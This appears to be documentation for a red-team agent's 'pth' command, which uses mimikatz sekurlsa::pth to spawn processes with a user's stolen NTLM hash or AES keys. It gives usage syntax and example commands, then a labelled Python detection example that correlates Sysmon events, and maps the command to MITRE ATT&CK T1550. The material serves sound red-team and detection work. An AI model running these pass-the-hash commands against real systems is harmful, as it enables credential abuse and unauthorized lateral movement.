Artifacts Generated: Process Create, Process Inject, Process Kill

Summary

Use mimikatz’s sekurlsa::pth module to spawn a new process with a user’s Kerberos keys.

Arguments

Domain

Domain that the specified user is part of.

User

Username for which you have obtained credential material.

NTLM

NTLM password hash of the specified user.

AES128 (Optional)

The AES128 key of the user. Used for overpass-the-hash.

AES256 (Optional)

The AES256 key of the user. Used for overpass-the-hash.

Run (Optional)

Program to spawn using alternate credentials. Default: cmd.exe.
When choosing a program to spawn, consider whether you need the process to be long-lived. A process that spawns and exits immediately is not a good candidate to perform steal_token against, for example, because the process will no longer exist when you attempt to impersonate the credential material.

Usage

pth -Domain [domain.local] -User [username] -NTLM [ntlm_hash_val] [-AES128 [aes_128_val] -AES256 [aes_256_val] -Run [cmd.exe]]
Example
pth -Domain contoso.local -User djhohnstein -NTLM 21BC7DCD88EE195ECF3728677A47815B
pth -Domain contoso.local -User djhohnstein -NTLM 21BC7DCD88EE195ECF3728677A47815B -Run powershell.exe
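The artifacts listed at the top of this page (Process Create, Process Inject, Process Kill) are what a defender can correlate. The following is an added detection example, not code from this project: it assumes simplified Sysmon-style records (Event ID 1 Process Create, 5 Process Terminated, 8 CreateRemoteThread, 10 ProcessAccess), assumes that the credential swap is visible as the parent opening lsass.exe, and uses a constructed 60-second window and constructed sample records.

```python
# Added example (not from the original page): correlate the Process Create /
# Process Inject / Process Kill artifacts this command leaves into one alert.
# Sysmon event IDs assumed: 1 (Process Create), 5 (Process Terminated),
# 8 (CreateRemoteThread), 10 (ProcessAccess). All records below are constructed.
from collections import defaultdict

WINDOW_SECONDS = 60  # assumed correlation window

SAMPLE_EVENTS = [  # constructed, simplified Sysmon-style records
    {"id": 1, "t": 0, "pid": 4100, "ppid": 3000, "image": "C:\\Windows\\System32\\cmd.exe"},
    {"id": 8, "t": 2, "src": 3000, "dst": 4100},
    {"id": 10, "t": 3, "src": 3000, "target": "C:\\Windows\\System32\\lsass.exe"},
    {"id": 1, "t": 5, "pid": 4200, "ppid": 3000, "image": "C:\\Windows\\System32\\notepad.exe"},
    {"id": 5, "t": 40, "pid": 4100},
]


def correlate(events, window=WINDOW_SECONDS):
    """Return one alert per child that its parent created, injected into, and whose
    parent opened LSASS within `window` seconds of the create; the child's
    termination time is recorded when present but is not required."""
    children = {}              # child pid -> (parent pid, create time, image)
    injected = set()           # (parent, child) pairs with a CreateRemoteThread
    lsass = defaultdict(list)  # parent pid -> times LSASS was opened
    killed = {}                # child pid -> terminate time
    for e in sorted(events, key=lambda e: e["t"]):
        if e["id"] == 1:
            children[e["pid"]] = (e["ppid"], e["t"], e["image"])
        elif e["id"] == 8 and e["dst"] in children and children[e["dst"]][0] == e["src"]:
            injected.add((e["src"], e["dst"]))
        elif e["id"] == 10 and e["target"].lower().endswith("\\lsass.exe"):
            lsass[e["src"]].append(e["t"])
        elif e["id"] == 5:
            killed[e["pid"]] = e["t"]
    alerts = []
    for child, (parent, t0, image) in children.items():
        if (parent, child) not in injected:
            continue  # a plain child process, no injection observed
        if not any(t0 <= t <= t0 + window for t in lsass[parent]):
            continue  # injection without LSASS access falls outside this rule
        alerts.append({"parent": parent, "child": child, "image": image,
                       "killed": killed.get(child)})
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print("suspected credential-swap process spawn:", alert)
```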

MITRE ATT&CK Mapping

  • T1550

Resources